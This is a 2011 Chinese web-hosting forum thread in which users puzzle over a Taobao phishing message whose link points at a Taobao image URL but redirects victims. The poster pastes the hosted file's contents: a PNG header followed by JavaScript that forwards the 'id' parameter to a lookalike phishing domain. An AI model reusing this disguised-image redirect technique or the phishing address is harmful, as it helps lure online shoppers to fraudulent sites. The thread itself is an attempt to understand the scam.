全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 5504|回复: 27

看看这个跳转是怎么实现的(淘宝新的钓鱼连接)

[复制链接]
发表于 2011-1-21 21:09:50 | 显示全部楼层 |阅读模式
刚收到旺旺信息,内容很老套,但是连接很牛,旺旺也判定是安全连接
  1. 老板,在吗,这款还有货吗?,http://img.taobao.com/shop-logo/8a/T1WGhZXalsXXb1upjX?id=7641741 怎么拍不了啊,我要买7件啊
复制代码
连接域名是淘宝的,但是自动跳转到了钓鱼网站
觉得蛮牛的
不知道怎么实现的
高手谁知道的。。
发表于 2011-1-21 21:10:55 | 显示全部楼层
牛啊
发表于 2011-1-21 21:13:49 | 显示全部楼层
真的哎。。
发表于 2011-1-21 21:15:53 | 显示全部楼层
图片里面加木马了吧
发表于 2011-1-21 21:15:56 | 显示全部楼层
去taobao传张图片 来对比看看...
发表于 2011-1-21 21:17:24 | 显示全部楼层
png漏洞?
这玩意在opera上无效,应该是针对ie的
发表于 2011-1-21 21:17:28 | 显示全部楼层
骗子们真是煞费苦心啊
 楼主| 发表于 2011-1-21 21:18:41 | 显示全部楼层
淘宝自己商品的图片一般都是在这个域名下
http://img08.taobaocdn.com
发表于 2011-1-21 21:19:08 | 显示全部楼层
这是某个官方图片空间的转换地址,现在有一种解释工具可以转换,跟官方差不多......黑客动画吧吧友回答的...
 楼主| 发表于 2011-1-21 21:20:48 | 显示全部楼层
opera下打开是这样一个代码
  1. 塒NG
  2. <html>

  3. <SCRIPT LANGUAGE="JavaScript">
  4. <!--
  5. function Request(strName)
  6. {
  7. var strHref = window.document.location.href;
  8. var intPos = strHref.indexOf("?");
  9. var strRight = strHref.substr(intPos + 1);

  10. var arrTmp = strRight.split("&");
  11. for(var i = 0; i < arrTmp.length; i++)
  12. {
  13. var arrTemp = arrTmp[i].split("=");

  14. if(arrTemp[0].toUpperCase() == strName.toUpperCase()) return arrTemp[1];
  15. }
  16. return "";
  17. }

  18. window.location.href="http://itam.taobao.cm.0drg.co.cc/h.taobao.com/tb1.asp?id="+Request("id");
  19. //-->

  20. </SCRIPT>



  21. </html>
  22. 
复制代码
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-5-21 19:05 , Processed in 0.066422 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表